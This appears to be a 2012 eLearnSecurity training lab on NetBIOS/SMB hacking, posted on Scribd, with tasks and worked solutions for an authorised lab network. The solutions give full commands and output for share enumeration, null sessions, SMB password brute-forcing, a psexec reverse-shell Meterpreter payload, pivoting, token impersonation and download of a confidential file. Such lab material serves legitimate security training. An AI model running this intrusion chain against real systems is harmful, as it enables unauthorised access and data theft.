Scribd
Upload
57 views18 pages

Lab 09.0 - NetBIOS Hacking

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
57 views18 pages

Lab 09.0 - NetBIOS Hacking

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

HERA

LAB ID: 9

NETBIOS
HACKING
[NetBIOS Hacking] LAB ID: 9

1. LAB
In this engagement you’re asked to check if it is possible to access the
documents of the organization from outside the corporate networks.

This is what your client has defined as scope of tests:

- Machine with public IP address: 10.130.40.70


- Organization network: 172.30.111.0/24

The machine with IP 10.130.40.70 can directly communicate with the


corporate network machines through an IPsec tunnel. This is a laptop
given by the organization to all of its remote workers. This machine has
access to the corporate documents so it has been included in the scope.

The following image summarizes the Lab environment:

eLearnSecurity s.r.l. © 2012 | H E R A 2


[NetBIOS Hacking] LAB ID: 9

2. GOALS
Access documents stored in restricted shares within the organization
network

3. WHAT YOU WILL LEARN


 Testing NetBIOS/SMB shares

 Exploiting weak passwords

 Exploiting null sessions

4. RECOMMENDED TOOLS
 Metasploit

 Nmap

 Winfo

eLearnSecurity s.r.l. © 2012 | H E R A 3


[NetBIOS Hacking] LAB ID: 9

5. TASKS
Task 1. Open ports

The only publically reachable target is machine 10.130.40.70. Get some


information about the machine and use tools like Nmap, in order to
discover if the host has ports 139/445 open.

Task 2. File shares

Use nbtstat ( windows ) or nmblookup commands ( linux ) to display the


NetBIOS name table.

Task 3. Null session

Check if null session is exploitable.

Task 4. SMB bruteforce

The anonymous account works, but doesn’t have enough privileges to get
any useful information or share from the target. Try performing a
bruteforce to get working credentials.

Tips: You can use Metasploit smb_login module or Nmap smb-brute script

Task 5. Enumerate shares and info

By now, you should have discovered working credentials. You can now try
to enumerate shares and host information.

Task 6. Exploit the machine

Exploit the machine using Metasploit psexec module. You will have to use
the credentials discovered at Task 4.

eLearnSecurity s.r.l. © 2012 | H E R A 4


[NetBIOS Hacking] LAB ID: 9

Task 7. Host discovery

Use the meterpreter session to discover hosts within the organization


network.

Task 8. Null session and file retrieval

Repeat Task 3 for each host discovered, check if null sessions are
available and then try to access shared files.

eLearnSecurity s.r.l. © 2012 | H E R A 5


[NetBIOS Hacking] LAB ID: 9

Solutions

eLearnSecurity s.r.l. © 2012 | H E R A 6


[NetBIOS Hacking] LAB ID: 9

Task 1. Open ports

In order to discover if ports 139 and 445 are open, we can run Nmap with
the following settings:
>>nmap –p139,445 10.130.40.70

As we can see from the results both ports are open.

Task 2. File shares

To display the NetBIOS name table we can use the following commands:

Windows:
\> nbtstat –a 10.130.40.70

eLearnSecurity s.r.l. © 2012 | H E R A 7


[NetBIOS Hacking] LAB ID: 9

Linux:
>>nmblookup –A 10.130.40.70

The <20> identifier signifies that the host has file shares enabled

Task 3. Null session

Since file share is enabled, we can try to enumerate files and folders with
anonymous login:

Windows:
\> net use \\10.130.40.70\IPC$ “” /u:””
\> net view 10.130.40.70

eLearnSecurity s.r.l. © 2012 | H E R A 8


[NetBIOS Hacking] LAB ID: 9

Linux:
>> smbclient –L 10.130.40.70

We are able to login without credentials, but we are not able to get any
information. This happens because of a security policy that will not
provide us with useful information without providing proper credentials.

eLearnSecurity s.r.l. © 2012 | H E R A 9


[NetBIOS Hacking] LAB ID: 9

Task 4. SMB bruteforce

Since we can’t get information with anonymous user, we can try to brute
force SMB and look for weak credentials. To do it we can use Metasploit
smb_login module as follows:
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set PASS_FILE /root/Desktop/default.pwd
PASS_FILE => /root/Desktop/default.pwd
msf auxiliary(smb_login) > set USER_FILE /root/Desktop/minimal.usr
USER_FILE => /root/Desktop/minimal.usr
msf auxiliary(smb_login) > set RHOSTS 10.130.40.70
RHOSTS => 10.130.40.70
msf auxiliary(smb_login) > run

[*] 10.130.40.70:445 SMB - Starting SMB login bruteforce


[-] 10.130.40.70 - This system allows guest sessions with any
credentials, these instances will not be reported.


[-] 10.130.40.70:445 SMB - [11/56] - |WORKGROUP - FAILED LOGIN (Windows 7
Professional 7600) administrator : 123456789 (STATUS_LOGON_FAILURE)
[*] Auth-User: "administrator"
[+] 10.130.40.70:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 7 Professional
7600) 'administrator' : 'password'
[-] 10.130.40.70:445 SMB - [13/56] - |WORKGROUP - FAILED LOGIN (Windows 7
Professional 7600) administrator : iloveyou (STATUS_LOGON_FAILURE)


[*] Auth-User: "test"
[+] 10.130.40.70:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 7 Professional
7600) 'test' : '12345'


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

eLearnSecurity s.r.l. © 2012 | H E R A 10


users

[NetBIOS Hacking] LAB ID: 9

Task 5. Enumerate shares and info

We have discovered working credentials, and we can now enumerate


host information. There are many tools and commands that we can use to
do it. The following command will use Nmap script to enumerate users:
>>nmap --script=smb-enum-users -p 445 10.130.40.70 --script-
args smbuser=administrator,smbpass=password

We can numerate shares using the commands:

Linux
>>smbclient -L 10.130.40.70 -U administrator

Windows
>>net use \\10.130.40.70\IPC$ password /u:administrator
>>net view \\10.130.40.70

eLearnSecurity s.r.l. © 2012 | H E R A 11


[NetBIOS Hacking] LAB ID: 9

Other tools like winfo will return the following information:

eLearnSecurity s.r.l. © 2012 | H E R A 12


[NetBIOS Hacking] LAB ID: 9

Task 6. Exploit the machine

By knowing working credentials, we can try to gain backdoor access to


the machine using Metasploit psexec module. This will allow us to use this
machine as a pivot to access the organization corporate network.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.130.40.70
RHOST => 10.130.40.70
msf exploit(psexec) > set SMBPass password
SMBPass => password
msf exploit(psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 172.16.10.5
LHOST => 172.16.10.5
msf exploit(psexec) > exploit

[*] Started reverse handler on 172.16.10.5:4444


[*] Connecting to the server...
[*] Authenticating to 10.130.40.70:445|WORKGROUP as user
'administrator'...
[*] Uploading payload...
[*] Created \qFWyTYZY.exe...


[*] Sending stage (752128 bytes) to 10.130.40.70
[*] Closing service handle...
[*] Deleting \qFWyTYZY.exe...
[*] Meterpreter session 1 opened (172.16.10.5:4444 -> 10.130.40.70:49201)
at 2012-07-23 17:45:58 +0200

meterpreter >

eLearnSecurity s.r.l. © 2012 | H E R A 13


[NetBIOS Hacking] LAB ID: 9

Task 7. Host discovery

In order to discover hosts inside the organization network with ports


139/445 open, we can use the module auxiliary/scanner/portscan/tcp.
First we need to set the route to the network and then use tcp module as
follows:

meterpreter > run autoroute –s 172.30.111.0/24


[*] Adding a route to 172.30.111.0/255.255.255.0...
[+] Added route to 172.30.111.0/255.255.255.0 via 10.130.40.70
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf exploit(psexec) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 172.30.111.0/24
RHOSTS => 172.30.111.0/24
msf auxiliary(tcp) > set THREADS 10
THREADS => 10
msf auxiliary(tcp) > set PORTS 139,445
PORTS => 139,445
msf auxiliary(tcp) > run

[*] 172.30.111.10:139 - TCP OPEN


[*] 172.30.111.10:445 - TCP OPEN
[*] Scanned 027 of 256 hosts (010% complete)
[*] Scanned 059 of 256 hosts (023% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 158 of 256 hosts (061% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Only host 172.30.111.10 has ports 139/445 open. Let’s focus on it.

eLearnSecurity s.r.l. © 2012 | H E R A 14


[NetBIOS Hacking] LAB ID: 9

Task 8. Null session

Now that we have discovered a potential target, we can use the same
commands used in Task 3 to detect if null sessions are available. To do it
we can run the OS shell on the exploited machine. Note that the shell will
run under system user.
meterpreter > shell
Process 1540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

We need to impersonate another user. Let’s change it with the following


commands:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available


========================================
eLS-Win7\Administrator
eLS-Win7\eLS
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available


========================================
NT AUTHORITY\ANONYMOUS LOGON

// Choose the user to impersonate

meterpreter > impersonate_token eLS-Win7\\Administrator


[+] Delegation token available
[+] Successfully impersonated user eLS-Win7\Administrator

meterpreter > shell


eLearnSecurity s.r.l. © 2012 | H E R A 15
[NetBIOS Hacking] LAB ID: 9

Process 3220 created.


Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
els-win7\administrator

C:\Windows\system32>

As you can see we are now running the shell as user administrator. We
can now run the net view command on the target host:
C:\Windows\system32>net view 172.30.111.10
net view 172.30.111.10
Shared resources at 172.30.111.10

Share name Type Used as Comment

-------------------------------------------------------------------------
C Disk
FooComShare Disk
My Documents Disk
The command completed successfully.

C:\Windows\system32>

As we can see from the results, we are able to list shares without any
credentials.

Note that we can get the same information in many different ways. We
can use the exploited machine as pivot or use Metasploit modules like
smb_enumshares as follows:

eLearnSecurity s.r.l. © 2012 | H E R A 16


[NetBIOS Hacking] LAB ID: 9

msf > use auxiliary/scanner/smb/smb_enumshares


msf auxiliary(smb_enumshares) > set RHOSTS 172.30.111.10
RHOSTS => 172.30.111.10
msf auxiliary(smb_enumshares) > run
[*] 172.30.111.10:139

My Documents - (DISK),
IPC$ - Remote IPC (IPC),
C - (DISK),
ADMIN$ - Remote Admin (DISK),
C$ - Default share (DISK),
FooComShare - (DISK)

[*] Auxiliary module execution completed


msf auxiliary(smb_enumshares) >

As you can see, without using any credential, we are able to enumerate
shares for the whole subnet. We can now navigate organization machine
shares. To do that, we can use the net use command as follows:
C:\>net use K: \\172.30.111.10\FooComShare
net use K: \\172.30.111.10\FooComShare
The command completed successfully.

C:\>K:
K:

K:\>dir
dir
Volume in drive K has no label.
Volume Serial Number is F441-FDC7

Directory of K:\

07/24/2012 12:33 AM <DIR> .


07/24/2012 12:33 AM <DIR> ..
07/24/2012 12:43 AM 458 Confidential.txt
1 File(s) 458 bytes
2 Dir(s) 984,576,000 bytes free
K:\>

eLearnSecurity s.r.l. © 2012 | H E R A 17


[NetBIOS Hacking] LAB ID: 9

Now that we are able to browse the shares content, we can download it
on our machine to read files. The following command allows us to
download the content of the share in our machine:
meterpreter > download K:\\ /root/Desktop/TargetShare -r
[*] downloading: K:\\Confidential.txt ->
/root/Desktop/TargetShare/Confidential.txt
[*] downloaded : K:\\Confidential.txt ->
/root/Desktop/TargetShare/Confidential.txt
meterpreter >

This file will be the ultimate proof for the client that the organization files
are not safe and that policies and proper configurations should be
implemented inside and outside the perimeter.

eLearnSecurity s.r.l. © 2012 | H E R A 18

You might also like